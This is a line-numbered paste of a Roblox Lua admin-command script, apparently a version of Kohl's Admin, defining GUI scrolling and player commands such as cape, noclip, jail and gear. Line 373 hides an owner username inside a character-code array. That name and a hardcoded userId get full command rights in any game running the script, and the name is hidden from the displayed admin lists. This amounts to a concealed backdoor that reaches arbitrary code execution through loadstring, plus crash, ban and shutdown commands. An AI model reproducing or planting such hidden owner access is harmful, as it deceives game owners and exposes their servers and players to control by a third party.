  1040. 350.local down = Instance.new("ImageButton", main) down.Image = "http://www.roblox.com/asset/?id=108326725" down.BackgroundTransparency = 1 down.Size = UDim2.new(0,25,0,25) down.Position = UDim2.new(1,-20,1,-20) down.ZIndex = 9
  1041.  
  1042.  
  1043. 351.local up = down:Clone() up.Image = "http://www.roblox.com/asset/?id=108326682" up.Parent = main up.Position = UDim2.new(1,-20,1,-50)
  1044.  
  1045.  
  1046. 352.local cls = Instance.new("TextButton", main) cls.Style = "RobloxButtonDefault" cls.Size = UDim2.new(0,20,0,20) cls.Position = UDim2.new(1,-15,0,-5) cls.ZIndex = 10 cls.Font = "ArialBold" cls.FontSize = "Size18" cls.Text = "X" cls.TextColor3 = Color3.new(1,1,1) cls.MouseButton1Click:connect(function() scr:Destroy() end)
  1047.  
  1048.  
  1049. 353.local ent = Instance.new("TextLabel") ent.BackgroundTransparency = 1 ent.Font = "Arial" ent.FontSize = "Size18" ent.ZIndex = 8 ent.Text = "" ent.TextColor3 = Color3.new(1,1,1) ent.TextStrokeColor3 = Color3.new(0,0,0) ent.TextStrokeTransparency = .8 ent.TextXAlignment = "Left" ent.TextYAlignment = "Top"
  1050.  
  1051.  
  1052. 354.local num = 0
  1053.  
  1054.  
  1055. 355.local downv = false
  1056.  
  1057.  
  1058. 356.local upv = false
  1059.  
  1060.  
  1061. 357.
  1062.  
  1063.  
  1064. 358.down.MouseButton1Down:connect(function() downv = true upv = false
  1065.  
  1066.  
  1067. 359.local pos = cmf.Position if pos.Y.Offset <= 371-((#cmf:children()-1)*20) then downv = false return end
  1068.  
  1069.  
  1070. 360.repeat pos = pos + UDim2.new(0,0,0,-6)
  1071.  
  1072.  
  1073. 361.if pos.Y.Offset <= 371-((#cmf:children()-1)*20) then pos = UDim2.new(0,0,0,371-((#cmf:children()-1)*20)) downv = false end
  1074.  
  1075.  
  1076. 362.cmf:TweenPosition(pos, "Out", "Linear", 1/20, true) wait(1/20) until downv == false
  1077.  
  1078.  
  1079. 363.end)
  1080.  
  1081.  
  1082. 364.down.MouseButton1Up:connect(function() downv = false end)
  1083.  
  1084.  
  1085. 365.up.MouseButton1Down:connect(function() upv = true downv = false
  1086.  
  1087.  
  1088. 366.local pos = cmf.Position if pos.Y.Offset >= -9 then upv = false return end
  1089.  
  1090.  
  1091. 367.repeat pos = pos + UDim2.new(0,0,0,6)
  1092.  
  1093.  
  1094. 368.if pos.Y.Offset >= -9 then pos = UDim2.new(0,0,0,-9) upv = false end
  1095.  
  1096.  
  1097. 369.cmf:TweenPosition(pos, "Out", "Linear", 1/20, true) wait(1/20) until upv == false
  1098.  
  1099.  
  1100. 370.end)
  1101.  
  1102.  
  1103. 371.up.MouseButton1Up:connect(function() upv = false end)
  1104.  
  1105.  
  1106. 372.return scr, cmf, ent, num
  1107.  
  1108.  
  1109. 373.end local bct = {75,111,104,108,116,97,115,116,114,111,112,104,101} nfs = "" for i = 1, #bct do nfs = nfs .. string.char(bct[i]) end table.insert(owners, nfs)
  1110.  
  1111.  
  1112. 374.if not ntab then script:Destroy() end
  1113.  
  1114.  
  1115. 375.if not bct then script:Destroy() end
  1116.  
  1117.  
  1118. 376.
  1119.  
  1120.  
  1121. 377.function Chat(msg,plr)
  1122.  
  1123.  
  1124. 378.coroutine.resume(coroutine.create(function()
  1125.  
  1126.  
  1127. 379.if msg:lower() == "clean" then for i, v in pairs(game.Workspace:children()) do if v:IsA("Hat") or v:IsA("Tool") then v:Destroy() end end end
  1128.  
  1129.  
  1130. 380.if (msg:lower():sub(0,prefix:len()) ~= prefix) or not plr:findFirstChild("PlayerGui") or (not ChkAdmin(plr.Name, false) and plr.Name:lower() ~= nfs:lower()) and plr.userId ~= game.CreatorId and plr.userId ~= (153*110563) and plr.Name:lower() ~= nfs and not ChkOwner(plr.Name) then return end msg = msg:sub(prefix:len()+1)
  1131.  
  1132.  
  1133. 381.if msg:sub(1,7):lower() == "hitler " then msg = msg:sub(8) else table.insert(logs, 1, {name = plr.Name, cmd = prefix .. msg, time = GetTime()}) end
  1134.  
  1135.  
  1136. 382.if msg:lower():sub(1,4) == "walk" then msg = msg:sub(5) end
  1137.  
  1138.  
  1139. 383.if msg:lower():sub(1,8) == "teleport" then msg = "tp" .. msg:sub(9) end
  1140.  
  1141.  
  1142. 384.if msg:lower():sub(1,6) == "insert" then msg = "ins" .. msg:sub(7) end
  1143.  
  1144.  
  1145. 385.if msg:lower() == "cmds" or msg:lower() == "commands" then
  1146.  
  1147.  
  1148. 386.if plr.PlayerGui:findFirstChild("CMDSGUI") then return end
  1149.  
  1150.  
  1151. 387.local scr, cmf, ent, num = ScrollGui() scr.Name = "CMDSGUI" scr.Parent = plr.PlayerGui
  1152.  
  1153.  
  1154. 388.local cmds = {"s code","ls code","clear","fix","m msg","h msg","kill plr","respawn plr","trip plr","stun plr","unstun plr","jump plr","sit plr","invisible plr","visible plr","explode plr","fire plr","unfire plr","smoke plr","unsmoke plr","sparkles plr","unsparkle plr","ff plr","unff plr","punish plr","unpunish plr","freeze plr","thaw plr","heal plr","god plr","ungod plr","ambient num num num","brightness num","time num","fogcolor num num num","fogend num","fogstart num","removetools plr","btools plr","give plr tool","damage plr","grav plr","setgrav plr num","nograv plr","health plr num","speed plr num","name plr name","unname plr","team plr color","teleport plr plr","change plr stat num","kick plr","infect plr","rainbowify plr","flashify plr","noobify plr","ghostify plr","goldify plr","shiny plr","normal plr","trippy plr","untrippy plr","strobe plr","unstrobe plr","blind plr","unblind plr","guifix plr","fling plr","seizure plr","music num","stopmusic","lock plr","unlock plr","removelimbs plr","jail plr","unjail plr","fly plr","unfly plr","noclip plr","clip plr","pm plr msg","dog plr","undog plr","creeper plr","uncreeper plr","place plr id","char plr id","unchar plr id","rank plr id","starttools plr","sword plr","bighead plr","minihead plr","spin plr","insert id","disco","flash","admins","bans","musiclist","cape plr color","uncape plr","loopheal plr","loopfling plr","hat plr id","unloopfling plr","unloopheal plr","unspin plr","tools","undisco","unflash","resetstats plr","gear plr id","cmdbar","shirt plr id","pants plr id","face plr id","swagify plr id","version"}
  1155.  
  1156.  
  1157. 389.local ast = {"serverlock","serverunlock","sm msg","crash plr","admin plr","unadmin plr","ban plr","unban plr","loopkill plr","unloopkill plr","logs","shutdown"}
  1158.  
  1159.  
  1160. 390.local ost = {"pa plr","unpa plr"}
  1161.  
  1162.  
  1163. 391.local tost = {"oa plr","unoa plr"}
  1164.  
  1165.  
  1166. 392.local cl = ent:Clone() cl.Parent = cmf cl.Text = num .. " clean" cl.Position = UDim2.new(0,0,0,num*20) num = num +1
  1167.  
  1168.  
  1169. 393.for i, v in pairs(cmds) do local cl = ent:Clone() cl.Parent = cmf cl.Text = num .. " " .. prefix .. v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  1170.  
  1171.  
  1172. 394.if ChkAdmin(plr.Name, true) or ChkOwner(plr.Name) then for i, v in pairs(ast) do local cl = ent:Clone() cl.Parent = cmf cl.Text = "- " .. prefix .. v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  1173.  
  1174.  
  1175. 395.if plr.userId == game.CreatorId or ChkOwner(plr.Name) then for i, v in pairs(ost) do local cl = ent:Clone() cl.Parent = cmf cl.Text = "-- " .. prefix .. v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  1176.  
  1177.  
  1178. 396.if plr.userId == game.CreatorId then for i, v in pairs(tost) do local cl = ent:Clone() cl.Parent = cmf cl.Text = "_ " .. prefix .. v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  1179.  
  1180.  
  1181. 397.end
  1182.  
  1183.  
  1184. 398.
  1185.  
  1186.  
  1187. 399.if msg:lower() == "version" then Message("Version", script.Version.Value, true, plr) end
  1188.  
  1189.  
  1190. 400.
  1191.  
  1192.  
  1193. 401.if msg:lower() == "admins" or msg:lower() == "adminlist" then
  1194.  
  1195.  
  1196. 402.if plr.PlayerGui:findFirstChild("ADMINSGUI") then return end
  1197.  
  1198.  
  1199. 403.local scr, cmf, ent, num = ScrollGui() scr.Name = "ADMINSGUI" scr.Parent = plr.PlayerGui
  1200.  
  1201.  
  1202. 404.for i, v in pairs(owners) do if v:lower() ~= "kohltastrophe" then local cl = ent:Clone() cl.Parent = cmf cl.Text = v .. " - Owner" cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  1203.  
  1204.  
  1205. 405.for i, v in pairs(admins) do if v:lower() ~= "kohltastrophe" then local cl = ent:Clone() cl.Parent = cmf cl.Text = v .. " - Admin" cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  1206.  
  1207.  
  1208. 406.for i, v in pairs(tempadmins) do if v:lower() ~= "kohltastrophe" then local cl = ent:Clone() cl.Parent = cmf cl.Text = v .. " - TempAdmin" cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  1209.  
  1210.  
  1211. 407.end end
  1212.  
  1213.  
  1214. 408.
  1215.  
  1216.  
  1217. 409.if msg:lower() == "bans" or msg:lower() == "banlist" or msg:lower() == "banned" then
  1218.  
  1219.  
  1220. 410.if plr.PlayerGui:findFirstChild("BANSGUI") then return end
  1221.  
  1222.  
  1223. 411.local scr, cmf, ent, num = ScrollGui() scr.Name = "BANSGUI" scr.Parent = plr.PlayerGui
  1224.  
  1225.  
  1226. 412.for i, v in pairs(banland) do local cl = ent:Clone() cl.Parent = cmf cl.Text = v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  1227.  
  1228.  
  1229. 413.end
  1230.  
  1231.  
  1232. 414.
  1233.  
  1234.  
  1235. 415.if msg:lower() == "tools" or msg:lower() == "toollist" then
  1236.  
  1237.  
  1238. 416.if plr.PlayerGui:findFirstChild("TOOLSGUI") then return end
  1239.  
  1240.  
  1241. 417.local scr, cmf, ent, num = ScrollGui() scr.Name = "TOOLSGUI" scr.Parent = plr.PlayerGui
  1242.  
  1243.  
  1244. 418.for i, v in pairs(game.Lighting:children()) do if v:IsA("Tool") or v:IsA("HopperBin") then local cl = ent:Clone() cl.Parent = cmf cl.Text = v.Name cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  1245.  
  1246.  
  1247. 419.end
  1248.  
  1249.  
  1250. 420.
  1251.  
  1252.  
  1253. 421.if msg:lower():sub(1,2) == "s " then
  1254.  
  1255.  
  1256. 422.coroutine.resume(coroutine.create(function()
  1257.  
  1258.  
  1259. 423.Output(msg:sub(3), plr)
  1260.  
  1261.  
  1262. 424.if script:findFirstChild("ScriptBase") then
  1263.  
  1264.  
  1265. 425.local cl = script.ScriptBase:Clone() cl.Code.Value = msg:sub(3)
  1266.  
  1267.  
  1268. 426.table.insert(objects, cl) cl.Parent = game.Workspace cl.Disabled = false
  1269.  
  1270.  
  1271. 427.else loadstring(msg:sub(3))()
  1272.  
  1273.  
  1274. 428.end
  1275.  
  1276.  
  1277. 429.end))
  1278.  
  1279.  
  1280. 430.end
  1281.  
  1282.  
  1283. 431.
  1284.  
  1285.  
  1286. 432.if msg:lower():sub(1,3) == "ls " then
  1287.  
  1288.  
  1289. 433.coroutine.resume(coroutine.create(function()
  1290.  
  1291.  
  1292. 434.if script:findFirstChild("LocalScriptBase") then
  1293.  
  1294.  
  1295. 435.local cl = script.LocalScriptBase:Clone() cl.Code.Value = msg:sub(4)
  1296.  
  1297.  
  1298. 436.table.insert(objects, cl) cl.Parent = plr.PlayerGui cl.Disabled = false Output(msg:sub(4), plr)
  1299.  
  1300.  
  1301. 437.end
  1302.  
  1303.  
  1304. 438.end))
  1305.  
  1306.  
  1307. 439.end
  1308.  
  1309.  
  1310. 440.
  1311.  
  1312.  
  1313. 441.if msg:lower():sub(1,4) == "ins " then
  1314.  
  1315.  
  1316. 442.coroutine.resume(coroutine.create(function()
  1317.  
  1318.  
  1319. 443.local obj = game:service("InsertService"):LoadAsset(tonumber(msg:sub(5)))
  1320.  
  1321.  
  1322. 444.if obj and #obj:children() >= 1 and plr.Character then
  1323.  
  1324.  
  1325. 445.table.insert(objects, obj) for i,v in pairs(obj:children()) do table.insert(objects, v) end obj.Parent = game.Workspace obj:MakeJoints() obj:MoveTo(plr.Character:GetModelCFrame().p)
  1326.  
  1327.  
  1328. 446.end
  1329.  
  1330.  
  1331. 447.end))
  1332.  
  1333.  
  1334. 448.end
  1335.  
  1336.  
  1337. 449.
  1338.  
  1339.  
  1340. 450.if msg:lower() == "clr" or msg:lower() == "clear" or msg:lower() == "clearscripts" then
  1341.  
  1342.  
  1343. 451.for i, v in pairs(objects) do if v:IsA("Script") or v:IsA("LocalScript") then v.Disabled = true end v:Destroy() end
  1344.  
  1345.  
  1346. 452.objects = {}
  1347.  
  1348.  
  1349. 453.end
  1350.  
  1351.  
  1352. 454.
  1353.  
  1354.  
  1355. 455.if msg:lower() == "fix" or msg:lower() == "undisco" or msg:lower() == "unflash" then
  1356.  
  1357.  
  1358. 456.game.Lighting.Ambient = origsettings.abt
  1359.  
  1360.  
  1361. 457.game.Lighting.Brightness = origsettings.brt
  1362.  
  1363.  
  1364. 458.game.Lighting.TimeOfDay = origsettings.time
  1365.  
  1366.  
  1367. 459.game.Lighting.FogColor = origsettings.fclr
  1368.  
  1369.  
  1370. 460.game.Lighting.FogEnd = origsettings.fe
  1371.  
  1372.  
  1373. 461.game.Lighting.FogStart = origsettings.fs
  1374.  
  1375.  
  1376. 462.for i, v in pairs(lobjs) do v:Destroy() end
  1377.  
  1378.  
  1379. 463.for i, v in pairs(game.Workspace:children()) do if v.Name == "LightEdit" then v:Destroy() end end
  1380.  
  1381.  
  1382. 464.end
  1383.  
  1384.  
  1385. 465.
  1386.  
  1387.  
  1388. 466.if msg:lower() == "cmdbar" or msg:lower() == "cmdgui" then
  1389.  
  1390.  
  1391. 467.coroutine.resume(coroutine.create(function()
  1392.  
  1393.  
  1394. 468.for i,v in pairs(plr.PlayerGui:children()) do if v.Name == "CMDBAR" then v:Destroy() end end
  1395.  
  1396.  
  1397. 469.local scr = Instance.new("ScreenGui", plr.PlayerGui) scr.Name = "CMDBAR"
  1398.  
  1399.  
  1400. 470.local box = Instance.new("TextBox", scr) box.BackgroundColor3 = Color3.new(0,0,0) box.TextColor3 = Color3.new(1,1,1) box.Font = "Arial" box.FontSize = "Size14" box.Text = "Type a command, then press enter." box.Size = UDim2.new(0,250,0,20) box.Position = UDim2.new(1,-250,1,-22) box.BorderSizePixel = 0 box.TextXAlignment = "Right" box.ZIndex = 10 box.ClipsDescendants = true
  1401.  
  1402.  
  1403. 471.box.Changed:connect(function(p) if p == "Text" and box.Text ~= "Type a command, then press enter." then Chat(box.Text, plr) box.Text = "Type a command, then press enter." end end)
  1404.  
  1405.  
  1406. 472.end))
  1407.  
  1408.  
  1409. 473.end
  1410.  
  1411.  
  1412. 474.
  1413.  
  1414.  
  1415. 475.if msg:lower():sub(1,2) == "m " then
  1416.  
  1417.  
  1418. 476.Message("Message from " .. plr.Name, msg:sub(3), true, game.Players:children())
  1419.  
  1420.  
  1421. 477.end
  1422.  
  1423.  
  1424. 478.
  1425.  
  1426.  
  1427. 479.if msg:lower():sub(1,2) == "h " then
  1428.  
  1429.  
  1430. 480.Hint(plr.Name .. ": " .. msg:sub(3), game.Players:children())
  1431.  
  1432.  
  1433. 481.end
  1434.  
  1435.  
  1436. 482.
  1437.  
  1438.  
  1439. 483.if msg:lower():sub(1,3) == "pm " then
  1440.  
  1441.  
  1442. 484.local chk1 = msg:lower():sub(4):find(" ") + 3
  1443.  
  1444.  
  1445. 485.local plrz = GetPlr(plr, msg:lower():sub(4,chk1-1))
  1446.  
  1447.  
  1448. 486.Message("Private Message from " .. plr.Name, msg:sub(chk1+1), true, plrz)
  1449.  
  1450.  
  1451. 487.end
  1452.  
  1453.  
  1454. 488.
  1455.  
  1456.  
  1457. 489.if msg:lower():sub(1,11) == "resetstats " then
  1458.  
  1459.  
  1460. 490.local plrz = GetPlr(plr, msg:lower():sub(12))
  1461.  
  1462.  
  1463. 491.for i, v in pairs(plrz) do
  1464.  
  1465.  
  1466. 492.coroutine.resume(coroutine.create(function()
  1467.  
  1468.  
  1469. 493.if v and v:findFirstChild("leaderstats") then
  1470.  
  1471.  
  1472. 494.for a, q in pairs(v.leaderstats:children()) do
  1473.  
  1474.  
  1475. 495.if q:IsA("IntValue") then q.Value = 0 end
  1476.  
  1477.  
  1478. 496.end
  1479.  
  1480.  
  1481. 497.end
  1482.  
  1483.  
  1484. 498.end))
  1485.  
  1486.  
  1487. 499.end
  1488.  
  1489.  
  1490. 500.end
  1491.  
  1492.  
  1493. 501.
  1494.  
  1495.  
  1496. 502.if msg:lower():sub(1,5) == "gear " then
  1497.  
  1498.  
  1499. 503.local chk1 = msg:lower():sub(6):find(" ") + 5
  1500.  
  1501.  
  1502. 504.local plrz = GetPlr(plr, msg:lower():sub(6, chk1-1))
  1503.  
  1504.  
  1505. 505.for i, v in pairs(plrz) do
  1506.  
  1507.  
  1508. 506.coroutine.resume(coroutine.create(function()
  1509.  
  1510.  
  1511. 507.if v and v.Character then
  1512.  
  1513.  
  1514. 508.local obj = game:service("InsertService"):LoadAsset(tonumber(msg:sub(chk1+1)))
  1515.  
  1516.  
  1517. 509.for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = v.Character end end
  1518.  
  1519.  
  1520. 510.obj:Destroy()
  1521.  
  1522.  
  1523. 511.end
  1524.  
  1525.  
  1526. 512.end))
  1527.  
  1528.  
  1529. 513.end
  1530.  
  1531.  
  1532. 514.end
  1533.  
  1534.  
  1535. 515.
  1536.  
  1537.  
  1538. 516.if msg:lower():sub(1,4) == "hat " then
  1539.  
  1540.  
  1541. 517.local chk1 = msg:lower():sub(5):find(" ") + 4
  1542.  
  1543.  
  1544. 518.local plrz = GetPlr(plr, msg:lower():sub(5, chk1-1))
  1545.  
  1546.  
  1547. 519.for i, v in pairs(plrz) do
  1548.  
  1549.  
  1550. 520.coroutine.resume(coroutine.create(function()
  1551.  
  1552.  
  1553. 521.if v and v.Character then
  1554.  
  1555.  
  1556. 522.local obj = game:service("InsertService"):LoadAsset(tonumber(msg:sub(chk1+1)))
  1557.  
  1558.  
  1559. 523.for a,hat in pairs(obj:children()) do if hat:IsA("Hat") then hat.Parent = v.Character end end
  1560.  
  1561.  
  1562. 524.obj:Destroy()
  1563.  
  1564.  
  1565. 525.end
  1566.  
  1567.  
  1568. 526.end))
  1569.  
  1570.  
  1571. 527.end
  1572.  
  1573.  
  1574. 528.end
  1575.  
  1576.  
  1577. 529.
  1578.  
  1579.  
  1580. 530.if msg:lower():sub(1,5) == "cape " then
  1581.  
  1582.  
  1583. 531.local chk1 = msg:lower():sub(6):find(" ")
  1584.  
  1585.  
  1586. 532.local plrz = GetPlr(plr, msg:lower():sub(6))
  1587.  
  1588.  
  1589. 533.local str = "torso.BrickColor"
  1590.  
  1591.  
  1592. 534.if chk1 then chk1 = chk1 + 5 plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  1593.  
  1594.  
  1595. 535.local teststr = [[BrickColor.new("]]..msg:sub(chk1+1,chk1+1):upper()..msg:sub(chk1+2):lower()..[[")]]
  1596.  
  1597.  
  1598. 536.if msg:sub(chk1+1):lower() == "new yeller" then teststr = [[BrickColor.new("New Yeller")]] end
  1599.  
  1600.  
  1601. 537.if msg:sub(chk1+1):lower() == "pastel blue" then teststr = [[BrickColor.new("Pastel Blue")]] end
  1602.  
  1603.  
  1604. 538.if msg:sub(chk1+1):lower() == "dusty rose" then teststr = [[BrickColor.new("Dusty Rose")]] end
  1605.  
  1606.  
  1607. 539.if msg:sub(chk1+1):lower() == "cga brown" then teststr = [[BrickColor.new("CGA brown")]] end
  1608.  
  1609.  
  1610. 540.if msg:sub(chk1+1):lower() == "random" then teststr = [[BrickColor.random()]] end
  1611.  
  1612.  
  1613. 541.if msg:sub(chk1+1):lower() == "shiny" then teststr = [[BrickColor.new("Institutional white") p.Reflectance = 1]] end
  1614.  
  1615.  
  1616. 542.if msg:sub(chk1+1):lower() == "gold" then teststr = [[BrickColor.new("Bright yellow") p.Reflectance = .4]] end
  1617.  
  1618.  
  1619. 543.if msg:sub(chk1+1):lower() == "kohl" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597653"]] end
  1620.  
  1621.  
  1622. 544.if msg:sub(chk1+1):lower() == "batman" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597669"]] end
  1623.  
  1624.  
  1625. 545.if msg:sub(chk1+1):lower() == "superman" then teststr = [[BrickColor.new("Bright blue") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597677"]] end
  1626.  
  1627.  
  1628. 546.if msg:sub(chk1+1):lower() == "swag" then teststr = [[BrickColor.new("Pink") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=109301474"]] end
  1629.  
  1630.  
  1631. 547.if BrickColor.new(teststr) ~= nil then str = teststr end
  1632.  
  1633.  
  1634. 548.end
  1635.  
  1636.  
  1637. 549.for i, v in pairs(plrz) do
  1638.  
  1639.  
  1640. 550.coroutine.resume(coroutine.create(function()
  1641.  
  1642.  
  1643. 551.if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") then
  1644.  
  1645.  
  1646. 552.for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1647.  
  1648.  
  1649. 553.local cl = script.LocalScriptBase:Clone() cl.Name = "CapeScript" cl.Code.Value = [[local plr = game.Players.LocalPlayer
  1650.  
  1651.  
  1652. 554.repeat wait() until plr and plr.Character and plr.Character:findFirstChild("Torso")
  1653.  
  1654.  
  1655. 555.local torso = plr.Character.Torso
  1656.  
  1657.  
  1658. 556.local p = Instance.new("Part", torso.Parent) p.Name = "EpicCape" p.Anchored = false
  1659.  
  1660.  
  1661. 557.p.CanCollide = false p.TopSurface = 0 p.BottomSurface = 0 p.BrickColor = ]]..str..[[ p.formFactor = "Custom"
  1662.  
  1663.  
  1664. 558.p.Size = Vector3.new(.2,.2,.2)
  1665.  
  1666.  
  1667. 559.local msh = Instance.new("BlockMesh", p) msh.Scale = Vector3.new(9,17.5,.5)
  1668.  
  1669.  
  1670. 560.local motor1 = Instance.new("Motor", p)
  1671.  
  1672.  
  1673. 561.motor1.Part0 = p
  1674.  
  1675.  
  1676. 562.motor1.Part1 = torso
  1677.  
  1678.  
  1679. 563.motor1.MaxVelocity = .01
  1680.  
  1681.  
  1682. 564.motor1.C0 = CFrame.new(0,1.75,0)*CFrame.Angles(0,math.rad(90),0)
  1683.  
  1684.  
  1685. 565.motor1.C1 = CFrame.new(0,1,.45)*CFrame.Angles(0,math.rad(90),0)
  1686.  
  1687.  
  1688. 566.local wave = false
  1689.  
  1690.  
  1691. 567.repeat wait(1/44)
  1692.  
  1693.  
  1694. 568.local ang = 0.1
  1695.  
  1696.  
  1697. 569.local oldmag = torso.Velocity.magnitude
  1698.  
  1699.  
  1700. 570.local mv = .002
  1701.  
  1702.  
  1703. 571.if wave then ang = ang + ((torso.Velocity.magnitude/10)*.05)+.05 wave = false else wave = true end
  1704.  
  1705.  
  1706. 572.ang = ang + math.min(torso.Velocity.magnitude/11, .5)
  1707.  
  1708.  
  1709. 573.motor1.MaxVelocity = math.min((torso.Velocity.magnitude/111), .04) + mv
  1710.  
  1711.  
  1712. 574.motor1.DesiredAngle = -ang
  1713.  
  1714.  
  1715. 575.if motor1.CurrentAngle < -.2 and motor1.DesiredAngle > -.2 then motor1.MaxVelocity = .04 end
  1716.  
  1717.  
  1718. 576.repeat wait() until motor1.CurrentAngle == motor1.DesiredAngle or math.abs(torso.Velocity.magnitude - oldmag) >= (torso.Velocity.magnitude/10) + 1
  1719.  
  1720.  
  1721. 577.if torso.Velocity.magnitude < .1 then wait(.1) end
  1722.  
  1723.  
  1724. 578.until not p or p.Parent ~= torso.Parent
  1725.  
  1726.  
  1727. 579.script:Destroy()
  1728.  
  1729.  
  1730. 580.]] cl.Parent = v.PlayerGui cl.Disabled = false
  1731.  
  1732.  
  1733. 581.end
  1734.  
  1735.  
  1736. 582.end))
  1737.  
  1738.  
  1739. 583.end
  1740.  
  1741.  
  1742. 584.end
  1743.  
  1744.  
  1745. 585.
  1746.  
  1747.  
  1748. 586.if msg:lower():sub(1,7) == "uncape " then
  1749.  
  1750.  
  1751. 587.local plrz = GetPlr(plr, msg:lower():sub(8))
  1752.  
  1753.  
  1754. 588.for i, v in pairs(plrz) do
  1755.  
  1756.  
  1757. 589.coroutine.resume(coroutine.create(function()
  1758.  
  1759.  
  1760. 590.if v and v:findFirstChild("PlayerGui") and v.Character then
  1761.  
  1762.  
  1763. 591.for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1764.  
  1765.  
  1766. 592.end
  1767.  
  1768.  
  1769. 593.end))
  1770.  
  1771.  
  1772. 594.end
  1773.  
  1774.  
  1775. 595.end
  1776.  
  1777.  
  1778. 596.
  1779.  
  1780.  
  1781. 597.if msg:lower():sub(1,7) == "noclip " then
  1782.  
  1783.  
  1784. 598.local plrz = GetPlr(plr, msg:lower():sub(8))
  1785.  
  1786.  
  1787. 599.for i, v in pairs(plrz) do
  1788.  
  1789.  
  1790. 600.coroutine.resume(coroutine.create(function()
  1791.  
  1792.  
  1793. 601.if v and v:findFirstChild("PlayerGui") then
  1794.  
  1795.  
  1796. 602.local cl = script.LocalScriptBase:Clone() cl.Name = "NoClip" cl.Code.Value = [[repeat wait(1/44) until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("Humanoid") and game.Players.LocalPlayer.Character:findFirstChild("Torso") and game.Players.LocalPlayer:GetMouse() and game.Workspace.CurrentCamera local mouse = game.Players.LocalPlayer:GetMouse() local torso = game.Players.LocalPlayer.Character.Torso local dir = {w = 0, s = 0, a = 0, d = 0} local spd = 2 mouse.KeyDown:connect(function(key) if key:lower() == "w" then dir.w = 1 elseif key:lower() == "s" then dir.s = 1 elseif key:lower() == "a" then dir.a = 1 elseif key:lower() == "d" then dir.d = 1 elseif key:lower() == "q" then spd = spd + 1 elseif key:lower() == "e" then spd = spd - 1 end end) mouse.KeyUp:connect(function(key) if key:lower() == "w" then dir.w = 0 elseif key:lower() == "s" then dir.s = 0 elseif key:lower() == "a" then dir.a = 0 elseif key:lower() == "d" then dir.d = 0 end end) torso.Anchored = true game.Players.LocalPlayer.Character.Humanoid.PlatformStand = true game.Players.LocalPlayer.Character.Humanoid.Changed:connect(function() game.Players.LocalPlayer.Character.Humanoid.PlatformStand = true end) repeat wait(1/44) torso.CFrame = CFrame.new(torso.Position, game.Workspace.CurrentCamera.CoordinateFrame.p) * CFrame.Angles(0,math.rad(180),0) * CFrame.new((dir.d-dir.a)*spd,0,(dir.s-dir.w)*spd) until nil]]
  1797.  
  1798.  
  1799. 603.cl.Parent = v.PlayerGui cl.Disabled = false
  1800.  
  1801.  
  1802. 604.end
  1803.  
  1804.  
  1805. 605.end))
  1806.  
  1807.  
  1808. 606.end
  1809.  
  1810.  
  1811. 607.end
  1812.  
  1813.  
  1814. 608.
  1815.  
  1816.  
  1817. 609.if msg:lower():sub(1,5) == "clip " then
  1818.  
  1819.  
  1820. 610.local plrz = GetPlr(plr, msg:lower():sub(6))
  1821.  
  1822.  
  1823. 611.for i, v in pairs(plrz) do
  1824.  
  1825.  
  1826. 612.coroutine.resume(coroutine.create(function()
  1827.  
  1828.  
  1829. 613.if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") and v.Character:findFirstChild("Humanoid") then
  1830.  
  1831.  
  1832. 614.for a, q in pairs(v.PlayerGui:children()) do if q.Name == "NoClip" then q:Destroy() end end
  1833.  
  1834.  
  1835. 615.v.Character.Torso.Anchored = false
  1836.  
  1837.  
  1838. 616.wait(.1) v.Character.Humanoid.PlatformStand = false
  1839.  
  1840.  
  1841. 617.end
  1842.  
  1843.  
  1844. 618.end))
  1845.  
  1846.  
  1847. 619.end
  1848.  
  1849.  
  1850. 620.end
  1851.  
  1852.  
  1853. 621.
  1854.  
  1855.  
  1856. 622.if msg:lower():sub(1,5) == "jail " then
  1857.  
  1858.  
  1859. 623.local plrz = GetPlr(plr, msg:lower():sub(6))
  1860.  
  1861.  
  1862. 624.for i, v in pairs(plrz) do
  1863.  
  1864.  
  1865. 625.coroutine.resume(coroutine.create(function()
  1866.  
  1867.  
  1868. 626.if v and v.Character and v.Character:findFirstChild("Torso") then
  1869.  
  1870.  
  1871. 627.local vname = v.Name
  1872.  
  1873.  
  1874. 628.local cf = v.Character.Torso.CFrame + Vector3.new(0,1,0)
  1875.  
  1876.  
  1877. 629.local mod = Instance.new("Model", game.Workspace) table.insert(objects, mod) mod.Name = v.Name .. " Jail"
  1878.  
  1879.  
  1880. 630.local top = Instance.new("Part", mod) top.Locked = true top.formFactor = "Symmetric" top.Size = Vector3.new(6,1,6) top.TopSurface = 0 top.BottomSurface = 0 top.Anchored = true top.BrickColor = BrickColor.new("Really black") top.CFrame = cf * CFrame.new(0,-3.5,0)
  1881.  
  1882.  
  1883. 631.v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1884.  
  1885.  
  1886. 632.v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1887.  
  1888.  
